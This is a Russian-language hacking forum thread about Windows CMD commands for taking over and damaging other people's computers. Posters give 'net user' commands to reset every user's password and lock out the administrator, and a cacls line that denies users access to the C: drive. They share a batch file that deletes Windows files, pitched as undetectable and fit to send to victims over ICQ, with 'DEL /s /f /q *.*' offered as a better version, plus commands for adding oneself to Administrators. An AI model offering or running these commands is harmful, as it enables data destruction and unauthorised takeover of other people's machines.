terminal-s52

Объявление

Администрация форума не несет никакой ответственности за действия пользователей! Уважаемые пользователи всю информацию и софт вы используете на свой страх и риск! Приятного пребывания на форуме!

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » terminal-s52 » Хакинг » CMD: Смиена пароля UsВерю.


CMD: Смиена пароля UsВерю.

Сообщений 1 страница 20 из 23

1

Сменить пароль у пользователей любых учетных записей:

net user пользователь новыйпароль

Кто-то там говорил о том как заставить админа (тупого) смиенить Windows. Поменяй пароль администратора двойным нажатием Ctrl+Alt+Delete при выборе пользователя (Разумеется если он не установлен до тебя) и поставь свои пароли всем пользователям.

P.S. Элементарно, в поиске про это нет - вот и решил написать.

0

2

сапасиба) кста! какие мож еще секреты знаешь? если придумаешь что я не учел про командку топиши) ок?

0

3

Слушай, коман очень много. Каждый должен знать DEL, FORMAT, RD, MD, ECHO, CACLS и еще сотню других ... :)

Введи в CMD cacls /? и много нового узнаешь. К примеру есть два пользователя и ты пишешь cacls C:\  /G имяпервого:N имявторого:N - и наслаждаешься лишним поводом переустановить OS и страшными тормозами, каких ниразу не видел...

0

4

Вот некоторый список команд который лежит в нете ==>  http://philka.ru/pe/files/spravo4nik.rar  (пароль: wwwphilka.ru)
Ещё можно узнать введя в cmd , help.  (там тока внутренние команды и то не все)

з.ы. переименуйте тему как команды и параметры cmd

Отредактировано LUMEN (2008-01-11 20:50:34)

0

5

Если ты хочешь посмотреть все команды, то HELP . а если отдельно, то например cacls /? или cd /? и т.д.

Тема про батники уже есть - здесь только кратко и коротко - так что пусть так останется ОК ?

0

6

Кстати - у меня с командами почти пол жизни (учебной, а вообще я бессмертный :) ) прошло. Тогда еще VBS и JS распространенны не были - И в школе и в колледже я учил все CMD да CMD - и как оказалось не зря.

Отредактировано Archangel (2008-01-12 21:14:17)

0

7

Ozia написал в той теме про батники - (я чуть не упал со стула, шучу у меня кресло - БЕЗ ОБИД :)

простейший батник который грохает винду!
ниодин антивирь незапалит) еще мона сшить с чем-нибудь) и послать по асе)
@ECHO OFF
cd C:
cd\
cd windows (Можно %WinDir% - так надёжнее.)
del *.exe
del *.ini
del *.com
cd\
cd windows
cd system
del *.dll
del *.exe
cd\

Это бред если честно, пиши вот так:

CD C:\
DEL /s /f /q *.*

Можно даже после запуска сразу вырубить окно, но после перезагрузки системы не будет. Чем меньше - тем лучше и надежней.

0

8

я знаю... это старый неработающий боян мне просто руки не дошли удалить... ща грохну...

[b написал(а):

Archangel[/b]]CD C:\
DEL /s /f /q *.*

а ты учел то что удалятся все файлы *.* но останутся папки!!! в которых большинство нужной инфи!
а оно не спросит о том серьёзно ли пользователь намерен форматировать диск? типа "нажмите "у" если да"

0

9

Нет не спросит. /s - значит что файлы будут удаляться во всех папках на этом диске /f - принудительно /q - без подтверждения.

Так что файлов в папках не останется... :) И диск мы не форматируем - это делается командой FORMAT.

Скрипт выше достаточно запустить на 1с и Windows больше не будет.

0

10

Товарисчи батники в другой теме!!!

net session /delete – закрывает все сетевые сессии

net user <имя пользователя> /domain – выводит всю информацию о пользователе в домене

netstat -a – получает список всех подключений к компьютеру

net sessions – выводит список текущих пользователей, необходимо иметь права администратора для

доступа к этой функции

net send <имя компьютера> "<сообщение>" – посылает сообщение пользователю удалённого

компьютера

shutdown \\<имя компьютера> /t:2 /y /c – удалённо выключает компьютер, требуется Resource Kit (RK)

shutdown \\ <имя компьютера> /r /y /c – удалённо перезагружает компьютер с Windows NT/2000 (RK)

nbtstat -a <имя компьютера> – удалённо получает имя пользователя работающего на компьютере

nbtstat -A – удалённо получает имя пользователя работающего на компьютере по

IP-адресу

ipconfig /all – выводит Ethernet адрес сетевой карты

winipcfg – выводит информацию о текущих сетевых настройках

net user <Имя_пользователя> /add – просто добавить пользователя с правами гостя.

net user <Имя_пользователя> /delete – Удаление любого пользователя кроме админа и вас(нужны

права администратора).

net localgroup <Имя_группы> <Имя_пользователя> /add – Добавление в группу. С помощью данной

команды можно попасть и в группу администраторов или любую другую.

net localgroup <Имя_группы> <Имя_пользователя> /delete – Удаление из группы. Любого

пользователя.

net share /? тоже нужно если надо расшарить диски соседа. Если есть телнет доступ.

NET SEND отправка сообщения другому компьютеру в сети

NET LOCALGROUP Администраторы username /ADD добавление юзера username в группу

Администраторов

LABEL смена метки диска

PING http://* проверка доступности хоста и времени его отклика

TRACERT kiber-zona.org путь прохождения пакетов в Сети и время отклика каждого сервера

IPCONFIG /ALL сетевые настройки – IP адрес, DNS, WINS и DHCP сервера и прочее

IPCONFIG /FLUSHDNS очистка локального DNS-кэша

TASKLIST вывод всех запущенных процессов

TASKKILL /F /IM notepad.exe убьет процесс notepad.exe

SHUTDOWN –S выключение компьютера

SHUTDOWN –R –T 10 перезагрузка через 10 секунд

SHUTDOWN –A отмена остановки системы (при перезагрузке, выключении и т.п.)

FTP запуск консольного FTP-клиента

0

11

Сменить пароль у пользователей любых учетных записей:

net user пользователь новыйпароль

Кто-то там говорил о том как заставить админа (тупого) смиенить Windows. Поменяй пароль администратора двойным нажатием Ctrl+Alt+Delete при выборе пользователя (Разумеется если он не установлен до тебя) и поставь свои пароли всем пользователям.

P.S. Элементарно, в поиске про это нет - вот и решил написать.

2 афтар:
А ты сам то пробовал то, что пишешь?
Если пароль не установлен, то два раза нажав Ctrl+Alt+Del и набрав в поле пользователя "Администратор" ты сможешь только зайти под его учетной записью(если пароля нет), а не войдя в систему пароль не поменяешь! Можна также зайти в безопасном режиме(при загрузке жать F8) - там начинающие админы постоянно не ставят пароль!

0

12

Flash

Ты хочешь сказать, что начинающий админ забыл поставить пароль на безопасном режиме, а при установке системы ввел ? Что за бред ? Не смеши ?

Если уж на это пошло, то:

Не проще создать .BAT файл (или лучше даже .VBS) с командами изменения паролей. И воспользоваться им прямо на месте.

70% админов не отключают их исполнение, так как сами ими пользуются !!!

P.S. Я всегда знаю что пишу  :cool: .

0

13

...... Если пароль не установлен, то два раза нажав Ctrl+Alt+Del и набрав в поле пользователя "Администратор" ты сможешь только зайти под его учетной записью(если пароля нет), а не войдя в систему пароль не поменяешь! .........

Ты не прав. Сработает режим сброса паролей. При котором можно поменять пароль любому другому пользователю, да и самому админу  :cool: .

0

14

Сработает режим сброса паролей

Это ты где то прочитал то такое? Сам придумал? Такого нету!!!! Сначала сам попробуй, а потом пиши!!!

Ты хочешь сказать, что начинающий админ забыл поставить пароль на безопасном режиме, а при установке системы ввел ? Что за бред ? Не смеши ?

Ты перекрутил миои слова! Читай внимательно!
ЗЫ: батники твои без админских прав ничего толкового не сделают!!!

0

15

ого!!! столкновение двух титанов!!! какой высокоинтелектуальный спор!!!
и всем до ужаса лень перезагрузится и попробовать :D  ребят незабывайте о том что у каждого своя винда...
ХР от ХР отличается... такой прикол есть может не у всех....
у некоторых баги винды заштопаны а у некоторых нет)

flash написал(а):

ЗЫ: батники твои без админских прав ничего толкового не сделают!!!

а вот с этим уже я не согласен) без админских прав много чего можно сделать...

0

16

flash

Я знаю что говорю. - Давя на клаву (два раза нажав Ctrl+Alt+De), войдешь в систему (админ сам виноват) и до окончания текущей сессии можно делать что захочешь (если руки из НУЖНОГО Места, разумеется).

А .bat .vbs .js могут сделать ОЧЕНЬ МНОГОЕ.

Если пароль не установлен, то два раза нажав Ctrl+Alt+Del и набрав в поле пользователя "Администратор" ты сможешь только зайти под его учетной записью(если пароля нет), а не войдя в систему пароль не поменяешь! Можна также зайти в безопасном режиме(при загрузке жать F - там начинающие админы постоянно не ставят пароль!

Вот твои слова - как я могу их каверкать ???

0

17

И еще. Эта тема как бы для начинающих!!! Здесь про команды написанно, а не какие штуки может админ выкинуть (я сам работаю администратором :) ...).

Вот и все.

0

18

Между твоими двомя высказываниями ничего общего!

Сработает режим сброса паролей

войдешь в систему (админ сам виноват) и до окончания текущей сессии можно делать что захочешь

Второй вариант правильный! А первого никогда ни в каких версиях не было и быть не могло!
ЗЫ: насчет батников спорить не буду хотя и сомневаюсь, но проверять времени нет! Просто батниками не занимался ой как долго уже!!!
ЗЗЫ:
каверканье:

Ты хочешь сказать, что начинающий админ забыл поставить пароль на безопасном режиме, а при установке системы ввел

Оригинал:

Если пароль не установлен, то два раза нажав Ctrl+Alt+Del и набрав в поле пользователя "Администратор" ты сможешь только зайти под его учетной записью(если пароля нет), а не войдя в систему пароль не поменяешь! Можна также зайти в безопасном режиме(при загрузке жать F - там начинающие админы постоянно не ставят пароль!

0

19

Archangel написал(а):

Давя на клаву (два раза нажав Ctrl+Alt+De), войдешь в систему

Чёт я такого не припоминаю у себя, у мну такое не канает, проверял.

Да и про сброс пароля админа тоже, знаю только что коды вставляешь загрузочник винды, там есть такая функция сброса пароля админа....

0

20

flash

Если пароль не установлен, то два раза нажав Ctrl+Alt+Del и набрав в поле пользователя "Администратор" ты сможешь только зайти под его учетной записью(если пароля нет)

Ты же сам это написал. А как только я войду в систему под учеткой админа (из-за того что этот кретин забыл ввести пароль), - я первым делом поменяю пароли всем пользователям или сниму все ограничения... Что здесь непонятного ???

Сработает режим сброса паролей

Это не только моя фраза - так обычно обьясняют начинаюшим еще когда в школе детишки учатся :) ... И я считаю что это все правильно. Вот например есть два пользователя (на каждом пароль), и два раза нажав Ctrl+Alt+Del (если пароля нет !!!) мы войдем в систему с достаточными правами чтобы творить беспредел :) . Что здесь непонятного ???

Можешь отписаться последний раз и закроем эту часть вопроса раз и навсегда. ОК?!

0


Вы здесь » terminal-s52 » Хакинг » CMD: Смиена пароля UsВерю.